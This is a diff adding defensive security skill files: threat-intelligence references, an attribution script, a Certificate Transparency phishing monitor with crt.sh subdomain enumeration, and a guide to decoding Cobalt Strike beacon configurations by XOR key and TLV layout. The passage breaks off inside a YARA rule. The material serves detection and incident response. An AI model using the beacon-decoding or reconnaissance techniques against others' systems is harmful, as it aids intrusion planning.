- **Traffic Light Protocol (TLP)**: Information sharing classification (CLEAR, GREEN, AMBER, RED)
|
||||
|
||||
## MITRE ATT&CK Relevance
|
||||
- Technique mapping for threat actor behavior classification
|
||||
- Data sources for detection capability assessment
|
||||
- Mitigation strategies linked to specific techniques
|
||||
|
||||
## Industry Frameworks
|
||||
- NIST Cybersecurity Framework (CSF) 2.0 - Identify function
|
||||
- ISO 27001:2022 - A.5.7 Threat Intelligence
|
||||
- FIRST Standards - TLP, CSIRT, vulnerability coordination
|
||||
|
||||
## References
|
||||
- [STIX 2.1 Specification](https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html)
|
||||
- [MITRE ATT&CK](https://attack.mitre.org/)
|
||||
- [Diamond Model Paper](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf)
|
||||
- [NIST CSF 2.0](https://www.nist.gov/cyberframework)
|
||||
@@ -0,0 +1,31 @@
|
||||
# Campaign Attribution Analysis Workflows
|
||||
|
||||
## Workflow 1: Collection and Analysis
|
||||
```
|
||||
[Intelligence Sources] --> [Data Collection] --> [Analysis] --> [Reporting]
|
||||
| | | |
|
||||
v v v v
|
||||
OSINT/HUMINT/SIGINT Normalize/Enrich Assess/Correlate Disseminate
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Planning**: Define intelligence requirements and collection priorities
|
||||
2. **Collection**: Gather data from relevant sources
|
||||
3. **Processing**: Normalize data formats and filter noise
|
||||
4. **Analysis**: Apply analytical frameworks and correlate findings
|
||||
5. **Production**: Generate intelligence products and reports
|
||||
6. **Dissemination**: Share with stakeholders via appropriate channels
|
||||
7. **Feedback**: Collect consumer feedback to refine future collection
|
||||
|
||||
## Workflow 2: Continuous Monitoring
|
||||
```
|
||||
[Watchlist] --> [Automated Monitoring] --> [Change Detection] --> [Alert/Update]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Define Watchlist**: Identify indicators, actors, and topics to monitor
|
||||
2. **Configure Monitoring**: Set up automated collection from relevant sources
|
||||
3. **Change Detection**: Identify new or changed intelligence
|
||||
4. **Assessment**: Evaluate significance of changes
|
||||
5. **Alerting**: Notify stakeholders of significant intelligence updates
|
||||
6. **Archive**: Store intelligence for historical analysis and trending
|
||||
@@ -0,0 +1,169 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Campaign Attribution Evidence Analysis Script
|
||||
|
||||
Implements structured attribution analysis:
|
||||
- Analysis of Competing Hypotheses (ACH) matrix
|
||||
- Infrastructure overlap scoring
|
||||
- TTP similarity comparison using ATT&CK
|
||||
- Evidence weighting and confidence assessment
|
||||
|
||||
Requirements:
|
||||
pip install attackcti stix2 requests
|
||||
|
||||
Usage:
|
||||
python process.py --evidence evidence.json --hypotheses actors.json --output report.json
|
||||
python process.py --compare-ttps --campaign campaign_techs.json --actor APT29
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
from collections import defaultdict
|
||||
|
||||
|
||||
class AttributionEngine:
|
||||
"""Structured attribution analysis using ACH methodology."""
|
||||
|
||||
def __init__(self):
|
||||
self.evidence = []
|
||||
self.hypotheses = {}
|
||||
|
||||
def load_evidence(self, filepath):
|
||||
with open(filepath) as f:
|
||||
self.evidence = json.load(f)
|
||||
|
||||
def add_evidence(self, category, description, value, confidence):
|
||||
self.evidence.append({
|
||||
"id": len(self.evidence),
|
||||
"category": category,
|
||||
"description": description,
|
||||
"value": value,
|
||||
"confidence": confidence,
|
||||
})
|
||||
|
||||
def add_hypothesis(self, actor_name, supporting_info=""):
|
||||
self.hypotheses[actor_name] = {
|
||||
"info": supporting_info,
|
||||
"assessments": {},
|
||||
"score": 0,
|
||||
}
|
||||
|
||||
def evaluate(self, evidence_id, actor_name, assessment):
|
||||
"""Evaluate evidence against hypothesis: C=consistent, I=inconsistent, N=neutral."""
|
||||
weight = self.evidence[evidence_id]["confidence"]
|
||||
self.hypotheses[actor_name]["assessments"][evidence_id] = assessment
|
||||
|
||||
if assessment == "C":
|
||||
self.hypotheses[actor_name]["score"] += weight
|
||||
elif assessment == "I":
|
||||
self.hypotheses[actor_name]["score"] -= weight * 2
|
||||
|
||||
def generate_ach_matrix(self):
|
||||
matrix = {"evidence": [], "hypotheses": {}}
|
||||
for e in self.evidence:
|
||||
matrix["evidence"].append({
|
||||
"id": e["id"],
|
||||
"category": e["category"],
|
||||
"description": e["description"],
|
||||
})
|
||||
|
||||
for actor, data in self.hypotheses.items():
|
||||
matrix["hypotheses"][actor] = {
|
||||
"assessments": data["assessments"],
|
||||
"score": data["score"],
|
||||
"consistent": sum(1 for a in data["assessments"].values() if a == "C"),
|
||||
"inconsistent": sum(1 for a in data["assessments"].values() if a == "I"),
|
||||
"neutral": sum(1 for a in data["assessments"].values() if a == "N"),
|
||||
}
|
||||
|
||||
return matrix
|
||||
|
||||
def rank(self):
|
||||
ranked = sorted(
|
||||
self.hypotheses.items(), key=lambda x: x[1]["score"], reverse=True
|
||||
)
|
||||
results = []
|
||||
for name, data in ranked:
|
||||
incon = sum(1 for a in data["assessments"].values() if a == "I")
|
||||
confidence = "HIGH" if data["score"] >= 80 and incon == 0 else \
|
||||
"MODERATE" if data["score"] >= 40 else "LOW"
|
||||
results.append({
|
||||
"actor": name,
|
||||
"score": data["score"],
|
||||
"confidence": confidence,
|
||||
"inconsistent_count": incon,
|
||||
})
|
||||
return results
|
||||
|
||||
|
||||
def compare_ttp_similarity(campaign_techs, actor_techs):
|
||||
campaign_set = set(campaign_techs)
|
||||
actor_set = set(actor_techs)
|
||||
common = campaign_set & actor_set
|
||||
|
||||
jaccard = len(common) / len(campaign_set | actor_set) if (campaign_set | actor_set) else 0
|
||||
return {
|
||||
"common": sorted(common),
|
||||
"jaccard_similarity": round(jaccard, 3),
|
||||
"campaign_coverage": round(len(common) / len(campaign_set) * 100, 1) if campaign_set else 0,
|
||||
}
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Campaign Attribution Analysis")
|
||||
parser.add_argument("--evidence", help="Evidence JSON file")
|
||||
parser.add_argument("--hypotheses", help="Hypotheses JSON file")
|
||||
parser.add_argument("--compare-ttps", action="store_true")
|
||||
parser.add_argument("--campaign", help="Campaign techniques JSON")
|
||||
parser.add_argument("--actor", help="Actor name for ATT&CK lookup")
|
||||
parser.add_argument("--output", default="attribution_report.json")
|
||||
|
||||
args = parser.parse_args()
|
||||
engine = AttributionEngine()
|
||||
|
||||
if args.evidence and args.hypotheses:
|
||||
engine.load_evidence(args.evidence)
|
||||
with open(args.hypotheses) as f:
|
||||
hyps = json.load(f)
|
||||
for h in hyps:
|
||||
engine.add_hypothesis(h["name"], h.get("info", ""))
|
||||
for eid, assessment in h.get("evaluations", {}).items():
|
||||
engine.evaluate(int(eid), h["name"], assessment)
|
||||
|
||||
matrix = engine.generate_ach_matrix()
|
||||
rankings = engine.rank()
|
||||
report = {"ach_matrix": matrix, "rankings": rankings}
|
||||
print(json.dumps(report, indent=2))
|
||||
|
||||
with open(args.output, "w") as f:
|
||||
json.dump(report, f, indent=2)
|
||||
|
||||
elif args.compare_ttps and args.campaign:
|
||||
with open(args.campaign) as f:
|
||||
campaign_techs = json.load(f)
|
||||
|
||||
if args.actor:
|
||||
try:
|
||||
from attackcti import attack_client
|
||||
lift = attack_client()
|
||||
groups = lift.get_groups()
|
||||
group = next(
|
||||
(g for g in groups if args.actor.lower() in g.get("name", "").lower()),
|
||||
None,
|
||||
)
|
||||
if group:
|
||||
gid = group["external_references"][0]["external_id"]
|
||||
techs = lift.get_techniques_used_by_group(gid)
|
||||
actor_techs = [
|
||||
t["external_references"][0]["external_id"]
|
||||
for t in techs if t.get("external_references")
|
||||
]
|
||||
result = compare_ttp_similarity(campaign_techs, actor_techs)
|
||||
print(json.dumps(result, indent=2))
|
||||
except ImportError:
|
||||
print("[-] attackcti not installed")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,312 @@
|
||||
---
|
||||
name: analyzing-certificate-transparency-for-phishing
|
||||
description: Monitor Certificate Transparency logs using crt.sh and Certstream to detect phishing domains, lookalike certificates, and unauthorized certificate issuance targeting your organization.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [certificate-transparency, ct-logs, phishing, crt-sh, certstream, ssl, domain-monitoring, threat-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Certificate Transparency for Phishing
|
||||
|
||||
## Overview
|
||||
|
||||
Certificate Transparency (CT) is an Internet security standard that creates a public, append-only log of all issued SSL/TLS certificates. Monitoring CT logs enables early detection of phishing domains that register certificates mimicking legitimate brands, unauthorized certificate issuance for owned domains, and certificate-based attack infrastructure. This skill covers querying CT logs via crt.sh, real-time monitoring with Certstream, building automated alerting for suspicious certificates, and integrating findings into threat intelligence workflows.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `requests`, `certstream`, `tldextract`, `Levenshtein` libraries
|
||||
- Access to crt.sh (https://crt.sh/) for historical CT log queries
|
||||
- Certstream (https://certstream.calidog.io/) for real-time monitoring
|
||||
- List of organization domains and brand keywords to monitor
|
||||
- Understanding of SSL/TLS certificate structure and issuance process
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Certificate Transparency Logs
|
||||
|
||||
CT logs are cryptographically assured, publicly auditable, append-only records of TLS certificate issuance. Major CAs (Let's Encrypt, DigiCert, Sectigo, Google Trust Services) submit all issued certificates to multiple CT logs. As of 2025, Chrome and Safari require CT for all publicly trusted certificates.
|
||||
|
||||
### Phishing Detection via CT
|
||||
|
||||
Attackers register lookalike domains and obtain free certificates (often from Let's Encrypt) to make phishing sites appear legitimate with HTTPS. CT monitoring detects these early because the certificate appears in logs before the phishing campaign launches, providing a window for proactive blocking.
|
||||
|
||||
### crt.sh Database
|
||||
|
||||
crt.sh is a free web interface and PostgreSQL database operated by Sectigo that indexes CT logs. It supports wildcard searches (`%.example.com`), direct SQL queries, and JSON API responses. It tracks certificate issuance, expiration, and revocation across all major CT logs.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Query crt.sh for Certificate History
|
||||
|
||||
```python
|
||||
import requests
|
||||
import json
|
||||
from datetime import datetime
|
||||
import tldextract
|
||||
|
||||
class CTLogMonitor:
|
||||
CRT_SH_URL = "https://crt.sh"
|
||||
|
||||
def __init__(self, monitored_domains, brand_keywords):
|
||||
self.monitored_domains = monitored_domains
|
||||
self.brand_keywords = [k.lower() for k in brand_keywords]
|
||||
|
||||
def query_crt_sh(self, domain, include_expired=False):
|
||||
"""Query crt.sh for certificates matching a domain."""
|
||||
params = {
|
||||
"q": f"%.{domain}",
|
||||
"output": "json",
|
||||
}
|
||||
if not include_expired:
|
||||
params["exclude"] = "expired"
|
||||
|
||||
resp = requests.get(self.CRT_SH_URL, params=params, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
certs = resp.json()
|
||||
print(f"[+] crt.sh: {len(certs)} certificates for *.{domain}")
|
||||
return certs
|
||||
return []
|
||||
|
||||
def find_suspicious_certs(self, domain):
|
||||
"""Find certificates that may be phishing attempts."""
|
||||
certs = self.query_crt_sh(domain)
|
||||
suspicious = []
|
||||
|
||||
for cert in certs:
|
||||
common_name = cert.get("common_name", "").lower()
|
||||
name_value = cert.get("name_value", "").lower()
|
||||
issuer = cert.get("issuer_name", "")
|
||||
not_before = cert.get("not_before", "")
|
||||
not_after = cert.get("not_after", "")
|
||||
|
||||
# Check for exact domain matches (legitimate)
|
||||
extracted = tldextract.extract(common_name)
|
||||
cert_domain = f"{extracted.domain}.{extracted.suffix}"
|
||||
if cert_domain == domain:
|
||||
continue # Legitimate certificate
|
||||
|
||||
# Flag suspicious patterns
|
||||
flags = []
|
||||
if domain.replace(".", "") in common_name.replace(".", ""):
|
||||
flags.append("contains target domain string")
|
||||
if any(kw in common_name for kw in self.brand_keywords):
|
||||
flags.append("contains brand keyword")
|
||||
if "let's encrypt" in issuer.lower():
|
||||
flags.append("free CA (Let's Encrypt)")
|
||||
|
||||
if flags:
|
||||
suspicious.append({
|
||||
"common_name": cert.get("common_name", ""),
|
||||
"name_value": cert.get("name_value", ""),
|
||||
"issuer": issuer,
|
||||
"not_before": not_before,
|
||||
"not_after": not_after,
|
||||
"serial": cert.get("serial_number", ""),
|
||||
"flags": flags,
|
||||
"crt_sh_id": cert.get("id", ""),
|
||||
"crt_sh_url": f"https://crt.sh/?id={cert.get('id', '')}",
|
||||
})
|
||||
|
||||
print(f"[+] Found {len(suspicious)} suspicious certificates")
|
||||
return suspicious
|
||||
|
||||
monitor = CTLogMonitor(
|
||||
monitored_domains=["mycompany.com", "mycompany.org"],
|
||||
brand_keywords=["mycompany", "mybrand", "myproduct"],
|
||||
)
|
||||
suspicious = monitor.find_suspicious_certs("mycompany.com")
|
||||
for cert in suspicious[:5]:
|
||||
print(f" [{cert['common_name']}] Flags: {cert['flags']}")
|
||||
```
|
||||
|
||||
### Step 2: Real-Time Monitoring with Certstream
|
||||
|
||||
```python
|
||||
import certstream
|
||||
import Levenshtein
|
||||
import re
|
||||
from datetime import datetime
|
||||
|
||||
class CertstreamMonitor:
|
||||
def __init__(self, watched_domains, brand_keywords, similarity_threshold=0.8):
|
||||
self.watched_domains = [d.lower() for d in watched_domains]
|
||||
self.brand_keywords = [k.lower() for k in brand_keywords]
|
||||
self.threshold = similarity_threshold
|
||||
self.alerts = []
|
||||
|
||||
def start_monitoring(self, max_alerts=100):
|
||||
"""Start real-time CT log monitoring."""
|
||||
print("[*] Starting Certstream monitoring...")
|
||||
print(f" Watching: {self.watched_domains}")
|
||||
print(f" Keywords: {self.brand_keywords}")
|
||||
|
||||
def callback(message, context):
|
||||
if message["message_type"] == "certificate_update":
|
||||
data = message["data"]
|
||||
leaf = data.get("leaf_cert", {})
|
||||
all_domains = leaf.get("all_domains", [])
|
||||
|
||||
for domain in all_domains:
|
||||
domain_lower = domain.lower().strip("*.")
|
||||
if self._is_suspicious(domain_lower):
|
||||
alert = {
|
||||
"domain": domain,
|
||||
"all_domains": all_domains,
|
||||
"issuer": leaf.get("issuer", {}).get("O", ""),
|
||||
"fingerprint": leaf.get("fingerprint", ""),
|
||||
"not_before": leaf.get("not_before", ""),
|
||||
"detected_at": datetime.now().isoformat(),
|
||||
"reason": self._get_reason(domain_lower),
|
||||
}
|
||||
self.alerts.append(alert)
|
||||
print(f" [ALERT] {domain} - {alert['reason']}")
|
||||
|
||||
if len(self.alerts) >= max_alerts:
|
||||
raise KeyboardInterrupt
|
||||
|
||||
try:
|
||||
certstream.listen_for_events(callback, url="wss://certstream.calidog.io/")
|
||||
except KeyboardInterrupt:
|
||||
print(f"\n[+] Monitoring stopped. {len(self.alerts)} alerts collected.")
|
||||
return self.alerts
|
||||
|
||||
def _is_suspicious(self, domain):
|
||||
"""Check if domain is suspicious relative to watched domains."""
|
||||
for watched in self.watched_domains:
|
||||
# Exact keyword match
|
||||
watched_base = watched.split(".")[0]
|
||||
if watched_base in domain and domain != watched:
|
||||
return True
|
||||
|
||||
# Levenshtein distance (typosquatting detection)
|
||||
domain_base = tldextract.extract(domain).domain
|
||||
similarity = Levenshtein.ratio(watched_base, domain_base)
|
||||
if similarity >= self.threshold and domain_base != watched_base:
|
||||
return True
|
||||
|
||||
# Brand keyword match
|
||||
for keyword in self.brand_keywords:
|
||||
if keyword in domain:
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
def _get_reason(self, domain):
|
||||
"""Determine why domain was flagged."""
|
||||
reasons = []
|
||||
for watched in self.watched_domains:
|
||||
watched_base = watched.split(".")[0]
|
||||
if watched_base in domain:
|
||||
reasons.append(f"contains '{watched_base}'")
|
||||
domain_base = tldextract.extract(domain).domain
|
||||
similarity = Levenshtein.ratio(watched_base, domain_base)
|
||||
if similarity >= self.threshold and domain_base != watched_base:
|
||||
reasons.append(f"similar to '{watched}' ({similarity:.0%})")
|
||||
for kw in self.brand_keywords:
|
||||
if kw in domain:
|
||||
reasons.append(f"brand keyword '{kw}'")
|
||||
return "; ".join(reasons) if reasons else "unknown"
|
||||
|
||||
cs_monitor = CertstreamMonitor(
|
||||
watched_domains=["mycompany.com"],
|
||||
brand_keywords=["mycompany", "mybrand"],
|
||||
similarity_threshold=0.75,
|
||||
)
|
||||
alerts = cs_monitor.start_monitoring(max_alerts=50)
|
||||
```
|
||||
|
||||
### Step 3: Enumerate Subdomains from CT Logs
|
||||
|
||||
```python
|
||||
def enumerate_subdomains_ct(domain):
|
||||
"""Discover all subdomains from Certificate Transparency logs."""
|
||||
params = {"q": f"%.{domain}", "output": "json"}
|
||||
resp = requests.get("https://crt.sh", params=params, timeout=30)
|
||||
|
||||
if resp.status_code != 200:
|
||||
return []
|
||||
|
||||
certs = resp.json()
|
||||
subdomains = set()
|
||||
for cert in certs:
|
||||
name_value = cert.get("name_value", "")
|
||||
for name in name_value.split("\n"):
|
||||
name = name.strip().lower()
|
||||
if name.endswith(f".{domain}") or name == domain:
|
||||
name = name.lstrip("*.")
|
||||
subdomains.add(name)
|
||||
|
||||
sorted_subs = sorted(subdomains)
|
||||
print(f"[+] CT subdomain enumeration for {domain}: {len(sorted_subs)} subdomains")
|
||||
return sorted_subs
|
||||
|
||||
subdomains = enumerate_subdomains_ct("example.com")
|
||||
for sub in subdomains[:20]:
|
||||
print(f" {sub}")
|
||||
```
|
||||
|
||||
### Step 4: Generate CT Intelligence Report
|
||||
|
||||
```python
|
||||
def generate_ct_report(suspicious_certs, certstream_alerts, domain):
|
||||
report = f"""# Certificate Transparency Intelligence Report
|
||||
## Target Domain: {domain}
|
||||
## Generated: {datetime.now().isoformat()}
|
||||
|
||||
## Summary
|
||||
- Suspicious certificates found: {len(suspicious_certs)}
|
||||
- Real-time alerts triggered: {len(certstream_alerts)}
|
||||
|
||||
## Suspicious Certificates (crt.sh)
|
||||
| Common Name | Issuer | Flags | crt.sh Link |
|
||||
|------------|--------|-------|-------------|
|
||||
"""
|
||||
for cert in suspicious_certs[:20]:
|
||||
flags = "; ".join(cert.get("flags", []))
|
||||
report += (f"| {cert['common_name']} | {cert['issuer'][:30]} "
|
||||
f"| {flags} | [View]({cert['crt_sh_url']}) |\n")
|
||||
|
||||
report += f"""
|
||||
## Real-Time Certstream Alerts
|
||||
| Domain | Issuer | Reason | Detected |
|
||||
|--------|--------|--------|----------|
|
||||
"""
|
||||
for alert in certstream_alerts[:20]:
|
||||
report += (f"| {alert['domain']} | {alert['issuer']} "
|
||||
f"| {alert['reason']} | {alert['detected_at'][:19]} |\n")
|
||||
|
||||
report += """
|
||||
## Recommendations
|
||||
1. Add flagged domains to DNS sinkhole / web proxy blocklist
|
||||
2. Submit takedown requests for confirmed phishing domains
|
||||
3. Monitor CT logs continuously for new certificate registrations
|
||||
4. Implement CAA DNS records to restrict certificate issuance for your domains
|
||||
5. Deploy DMARC to prevent email spoofing from lookalike domains
|
||||
"""
|
||||
with open(f"ct_report_{domain.replace('.','_')}.md", "w") as f:
|
||||
f.write(report)
|
||||
print(f"[+] CT report saved")
|
||||
return report
|
||||
|
||||
generate_ct_report(suspicious, alerts if 'alerts' in dir() else [], "mycompany.com")
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- crt.sh queries return certificate data for target domains
|
||||
- Suspicious certificates identified based on lookalike patterns
|
||||
- Certstream real-time monitoring detects new phishing certificates
|
||||
- Subdomain enumeration produces comprehensive list from CT logs
|
||||
- Alerts generated with reason classification
|
||||
- CT intelligence report created with actionable recommendations
|
||||
|
||||
## References
|
||||
|
||||
- [crt.sh Certificate Search](https://crt.sh/)
|
||||
- [Certstream Real-Time CT Monitor](https://certstream.calidog.io/)
|
||||
- [River Security: CT Logs for Attack Surface Discovery](https://riversecurity.eu/finding-attack-surface-and-fraudulent-domains-via-certificate-transparency-logs/)
|
||||
- [Let's Encrypt: Certificate Transparency Logs](https://letsencrypt.org/docs/ct-logs/)
|
||||
- [SSLMate Cert Spotter](https://sslmate.com/certspotter/)
|
||||
- [CyberSierra: CT Logs as Early Warning System](https://cybersierra.co/blog/ssl-certificate-transparency-logs/)
|
||||
@@ -0,0 +1,360 @@
|
||||
---
|
||||
name: analyzing-cobalt-strike-beacon-configuration
|
||||
description: Extract and analyze Cobalt Strike beacon configuration from PE files and memory dumps to identify C2 infrastructure, malleable profiles, and operator tradecraft.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [cobalt-strike, beacon, c2, malware-analysis, config-extraction, threat-hunting, red-team-tools]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Cobalt Strike Beacon Configuration
|
||||
|
||||
## Overview
|
||||
|
||||
Cobalt Strike is a commercial adversary simulation tool widely abused by threat actors for post-exploitation operations. Beacon payloads contain embedded configuration data that reveals C2 server addresses, communication protocols, sleep intervals, jitter values, malleable C2 profile settings, watermark identifiers, and encryption keys. Extracting this configuration from PE files, shellcode, or memory dumps is critical for incident responders to map attacker infrastructure and attribute campaigns. The beacon configuration is XOR-encoded using a single byte (0x69 for version 3, 0x2e for version 4) and stored in a Type-Length-Value (TLV) format within the .data section.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `dissect.cobaltstrike`, `pefile`, `yara-python`
|
||||
- SentinelOne CobaltStrikeParser (`parse_beacon_config.py`)
|
||||
- Hex editor (010 Editor, HxD) for manual inspection
|
||||
- Understanding of PE file format and XOR encoding
|
||||
- Memory dump acquisition tools (Volatility3, WinDbg)
|
||||
- Network analysis tools (Wireshark) for C2 traffic correlation
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Beacon Configuration Structure
|
||||
|
||||
Cobalt Strike beacons store their configuration as a blob of TLV (Type-Length-Value) entries within the .data section of the PE. Stageless beacons XOR the entire beacon code with a 4-byte key. The configuration blob itself uses a single-byte XOR key. Each TLV entry contains a 2-byte type identifier (e.g., 0x0001 for BeaconType, 0x0008 for C2Server), a 2-byte length, and variable-length data.
|
||||
|
||||
### Malleable C2 Profiles
|
||||
|
||||
The beacon configuration encodes the malleable C2 profile that dictates HTTP request/response transformations, including URI paths, headers, metadata encoding (Base64, NetBIOS), and data transforms. Analyzing these settings reveals how the beacon disguises its traffic to blend with legitimate web traffic.
|
||||
|
||||
### Watermark and License Identification
|
||||
|
||||
Each Cobalt Strike license embeds a unique watermark (4-byte integer) into generated beacons. Extracting the watermark can link multiple beacons to the same operator or cracked license. Known watermark databases maintained by threat intelligence providers map watermarks to specific threat actors or leaked license keys.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Extract Configuration with CobaltStrikeParser
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Extract Cobalt Strike beacon config from PE or memory dump."""
|
||||
import sys
|
||||
import json
|
||||
|
||||
# Using SentinelOne's CobaltStrikeParser
|
||||
# pip install dissect.cobaltstrike
|
||||
from dissect.cobaltstrike.beacon import BeaconConfig
|
||||
|
||||
def extract_beacon_config(filepath):
|
||||
"""Parse beacon configuration from file."""
|
||||
configs = list(BeaconConfig.from_path(filepath))
|
||||
|
||||
if not configs:
|
||||
print(f"[-] No beacon configuration found in {filepath}")
|
||||
return None
|
||||
|
||||
for i, config in enumerate(configs):
|
||||
print(f"\n[+] Beacon Configuration #{i+1}")
|
||||
print(f"{'='*60}")
|
||||
|
||||
settings = config.as_dict()
|
||||
|
||||
# Critical fields for incident response
|
||||
critical_fields = [
|
||||
"SETTING_C2_REQUEST",
|
||||
"SETTING_C2_RECOVER",
|
||||
"SETTING_PUBKEY",
|
||||
"SETTING_DOMAINS",
|
||||
"SETTING_BEACONTYPE",
|
||||
"SETTING_PORT",
|
||||
"SETTING_SLEEPTIME",
|
||||
"SETTING_JITTER",
|
||||
"SETTING_MAXGET",
|
||||
"SETTING_SPAWNTO_X86",
|
||||
"SETTING_SPAWNTO_X64",
|
||||
"SETTING_PIPENAME",
|
||||
"SETTING_WATERMARK",
|
||||
"SETTING_C2_VERB_GET",
|
||||
"SETTING_C2_VERB_POST",
|
||||
"SETTING_USERAGENT",
|
||||
"SETTING_PROTOCOL",
|
||||
]
|
||||
|
||||
for field in critical_fields:
|
||||
value = settings.get(field, "N/A")
|
||||
print(f" {field}: {value}")
|
||||
|
||||
return settings
|
||||
|
||||
return None
|
||||
|
||||
|
||||
def extract_c2_indicators(config):
|
||||
"""Extract actionable C2 indicators from beacon config."""
|
||||
indicators = {
|
||||
"c2_domains": [],
|
||||
"c2_ips": [],
|
||||
"c2_urls": [],
|
||||
"user_agent": "",
|
||||
"named_pipes": [],
|
||||
"spawn_processes": [],
|
||||
"watermark": "",
|
||||
}
|
||||
|
||||
if not config:
|
||||
return indicators
|
||||
|
||||
# Extract C2 domains
|
||||
domains = config.get("SETTING_DOMAINS", "")
|
||||
if domains:
|
||||
for domain in str(domains).split(","):
|
||||
domain = domain.strip().rstrip("/")
|
||||
if domain:
|
||||
indicators["c2_domains"].append(domain)
|
||||
|
||||
# Extract user agent
|
||||
indicators["user_agent"] = str(config.get("SETTING_USERAGENT", ""))
|
||||
|
||||
# Extract named pipes
|
||||
pipe = config.get("SETTING_PIPENAME", "")
|
||||
if pipe:
|
||||
indicators["named_pipes"].append(str(pipe))
|
||||
|
||||
# Extract spawn-to processes
|
||||
for arch in ["SETTING_SPAWNTO_X86", "SETTING_SPAWNTO_X64"]:
|
||||
proc = config.get(arch, "")
|
||||
if proc:
|
||||
indicators["spawn_processes"].append(str(proc))
|
||||
|
||||
# Extract watermark
|
||||
indicators["watermark"] = str(config.get("SETTING_WATERMARK", ""))
|
||||
|
||||
return indicators
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print(f"Usage: {sys.argv[0]} <beacon_file_or_dump>")
|
||||
sys.exit(1)
|
||||
|
||||
config = extract_beacon_config(sys.argv[1])
|
||||
if config:
|
||||
indicators = extract_c2_indicators(config)
|
||||
print(f"\n[+] Extracted C2 Indicators:")
|
||||
print(json.dumps(indicators, indent=2))
|
||||
```
|
||||
|
||||
### Step 2: Manual XOR Decryption of Beacon Config
|
||||
|
||||
```python
|
||||
import struct
|
||||
|
||||
def find_and_decrypt_config(data):
|
||||
"""Manually locate and decrypt beacon configuration."""
|
||||
# Cobalt Strike 4.x uses 0x2e as XOR key
|
||||
xor_keys = [0x2e, 0x69] # v4, v3
|
||||
|
||||
for xor_key in xor_keys:
|
||||
# Search for the config magic bytes after XOR
|
||||
# Config starts with 0x0001 (BeaconType) XOR'd with key
|
||||
magic = bytes([0x00 ^ xor_key, 0x01 ^ xor_key,
|
||||
0x00 ^ xor_key, 0x02 ^ xor_key])
|
||||
|
||||
offset = data.find(magic)
|
||||
if offset == -1:
|
||||
continue
|
||||
|
||||
print(f"[+] Found config at offset 0x{offset:x} (XOR key: 0x{xor_key:02x})")
|
||||
|
||||
# Decrypt the config blob (typically 4096 bytes)
|
||||
config_size = 4096
|
||||
encrypted = data[offset:offset + config_size]
|
||||
decrypted = bytes([b ^ xor_key for b in encrypted])
|
||||
|
||||
# Parse TLV entries
|
||||
entries = parse_tlv(decrypted)
|
||||
return entries
|
||||
|
||||
return None
|
||||
|
||||
|
||||
def parse_tlv(data):
|
||||
"""Parse Type-Length-Value configuration entries."""
|
||||
entries = {}
|
||||
offset = 0
|
||||
|
||||
# TLV field type mapping
|
||||
field_names = {
|
||||
0x0001: "BeaconType",
|
||||
0x0002: "Port",
|
||||
0x0003: "SleepTime",
|
||||
0x0004: "MaxGetSize",
|
||||
0x0005: "Jitter",
|
||||
0x0006: "MaxDNS",
|
||||
0x0007: "Deprecated_PublicKey",
|
||||
0x0008: "C2Server",
|
||||
0x0009: "UserAgent",
|
||||
0x000a: "PostURI",
|
||||
0x000b: "Malleable_C2_Instructions",
|
||||
0x000c: "Deprecated_HttpGet_Metadata",
|
||||
0x000d: "SpawnTo_x86",
|
||||
0x000e: "SpawnTo_x64",
|
||||
0x000f: "CryptoScheme",
|
||||
0x001a: "Watermark",
|
||||
0x001d: "C2_HostHeader",
|
||||
0x0024: "PipeName",
|
||||
0x0025: "Year",
|
||||
0x0026: "Month",
|
||||
0x0027: "Day",
|
||||
0x0036: "ProxyHostname",
|
||||
}
|
||||
|
||||
while offset + 6 <= len(data):
|
||||
entry_type = struct.unpack(">H", data[offset:offset+2])[0]
|
||||
entry_len_type = struct.unpack(">H", data[offset+2:offset+4])[0]
|
||||
entry_len = struct.unpack(">H", data[offset+4:offset+6])[0]
|
||||
|
||||
if entry_type == 0:
|
||||
break
|
||||
|
||||
value_start = offset + 6
|
||||
value_end = value_start + entry_len
|
||||
value_data = data[value_start:value_end]
|
||||
|
||||
field_name = field_names.get(entry_type, f"Unknown_0x{entry_type:04x}")
|
||||
|
||||
if entry_len_type == 1: # Short
|
||||
value = struct.unpack(">H", value_data[:2])[0]
|
||||
elif entry_len_type == 2: # Int
|
||||
value = struct.unpack(">I", value_data[:4])[0]
|
||||
elif entry_len_type == 3: # String/Blob
|
||||
value = value_data.rstrip(b'\x00').decode('utf-8', errors='replace')
|
||||
else:
|
||||
value = value_data.hex()
|
||||
|
||||
entries[field_name] = value
|
||||
print(f" {field_name}: {value}")
|
||||
|
||||
offset = value_end
|
||||
|
||||
return entries
|
||||
```
|
||||
|
||||
### Step 3: YARA Rule for Beacon Detection
|
||||
|
||||
```python
|
||||
import yara
|
||||
|
||||
cobalt_strike_rule = """
|
||||
rule CobaltStrike_Beacon_Config {
|
||||
meta:
|
||||
description = "Detects Cobalt Strike beacon configuration"
|
||||
author = "Malware Analysis Team"
|
||||
date = "2025-01-01"
|
||||
|
||||
strings:
|
||||
